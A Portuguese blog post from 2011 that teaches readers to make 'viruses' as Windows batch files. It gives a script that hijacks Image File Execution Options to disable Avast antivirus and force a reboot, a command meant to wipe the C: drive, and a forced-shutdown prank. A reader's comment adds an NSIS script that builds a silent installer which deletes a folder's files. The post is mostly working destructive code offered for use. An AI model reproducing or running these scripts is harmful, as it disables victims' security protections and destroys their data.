sexta-feira, 25 de março de 2011

Criando Virus !

Codigos de Virus

Pessoal estarei mostrando para vcs alguns comandos que podem ser utilizados como virus esses comandos são salvos em linguagem .BAT
qua nao exige conhecimento de programção, Voce pode usar o propio Bloco de notas do windows ou qualquer editor de textos que vc tiver
e so colar os codigos e salvar com .BAT ou .CMD no final do nome do arquivo (Ex:  Alguma coisa.bat)

1º AVASTKill  - HeadPlay
Como o Nome sugere esse BAT Deleta o AVAST um dos mais usados AntiVirus  do mercado

@Title AVKill - Kouback_T-H4CK3R

#echo off
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashDisp.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswupdsv.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashserv.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashMaisv.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ash***sv.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashQuick.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sched.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VisthUpd.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVASTSS.scr" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashSimpl.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashCmd.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashSimp2.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashEnhcd.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
shutdown -f -r -t 0


2º Adeus Windows.
Este comando e pra fuder mesmo o 
PC entao de maneira aulguma execute ele

@ECHO OFF
@BREAK OFF
deltree/C: Y\*.*

 

2º Pegadinha do malandro .
Este um mais uma brincadeira nao e um virus de verdade mais e 
divertido, e o famoso Shutdown -s

@title A VACA FOI PRO BREJO By Headplay !kkkkkkk'a

@Echo off

ECHO: PC INFECTED!!!!

shutdown -s -t 5 -c "Pegadinha do Malandro"

4 comentários:

  1. cara como achou meu codigo
    algum amigo que entrou te mandou??
    como achou meu site??

    ResponderExcluir
  2. Pesquisando..
    Postei aki ..axei interessante ..

    Google.

    XD'

    ResponderExcluir
  3. como posso formatar um pendriver em formato raw ,e tenho um hd de 500 gigas que aparece na bios mais nao consigo formata e o hd que vem dentro do aparelho da sky ja tentei com linux formatei e instalei o seven ,depois reiniciei e no consigo ligar mais tentei formatar denovo e dis que so tem 128 gogas e nao consigo acesssalo por nada nem no windows nem consigo instalar o seven denovo me da uma luz ai

    ResponderExcluir
  4. !define PRODUCT_NAME "Mensagem do virus"
    !define PRODUCT_VERSION "1.0"
    !define PRODUCT_PUBLISHER "Nome do criador"
    SetCompressor lzma
    Name "${PRODUCT_NAME} ${PRODUCT_VERSION}"
    OutFile "MeuVirus.exe"
    InstallDir "$TEMP"
    Icon "${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico"
    SilentInstall silent
    Section "Sec001" SEC01
    Delete /REBOOTOK "C:\imagens\*.*"
    SectionEnd

    ResponderExcluir